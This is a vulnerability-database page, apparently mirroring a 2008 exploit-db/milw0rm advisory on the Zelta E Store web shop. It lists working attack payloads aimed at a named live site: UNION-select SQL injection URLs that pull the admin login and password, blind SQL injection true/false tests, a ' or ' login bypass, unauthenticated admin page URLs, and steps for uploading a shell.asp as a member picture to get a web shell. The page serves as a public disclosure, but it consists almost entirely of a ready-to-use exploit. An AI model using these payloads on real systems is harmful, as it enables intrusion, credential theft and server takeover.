Zelta E Store - Arbitrary File Upload / Bypass / SQL Injection / Blind SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057035 漏洞类型
发布时间 2008-12-16 更新时间 2008-12-16
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/7494
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
[~] Zelta E Store RFU/BYPASS/R-SQL/B-SQL Multiple Remote Vulns. 
[~]
[~] script: http://www.zeltatrade.com/
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu   msn: trt-turk@hotmail.com
[~]
[~] Date: 16/12/2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] dangerous-unit (D-Unit): ZoRLu & SuB-ZeRo 
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~] -----------------------------------------------------------

exp for demo: (R-SQL)

user: http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+union+select+1,adminlogin,3,4+from+admin

pass: http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+union+select+1,adminpass,3,4+from+admin


exp for demo: (B-SQL)

http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+and+1=1 (true)

http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+and+1=100 (false)


exp for demo: (auth bypass)

http://joineazy.com/members/login.asp

username: trt-turk@hotmail.com

pass: ' or '


exp for demo: (admin bypass)

http://joineazy.com/embadmin/admin_main.asp

http://joineazy.com/embadmin/site_setup.asp

http://joineazy.com/embadmin/main_baseimage.asp


exp for demo: (RFU)

firs you register to site

login to site and edit your pictures select your shell.asp

go your shell asp:

http://joineazy.com/members/member_pictures/shell.asp

[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke 
[~]
[~] yildirimordulari.org  &  darkc0de.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2008-12-16]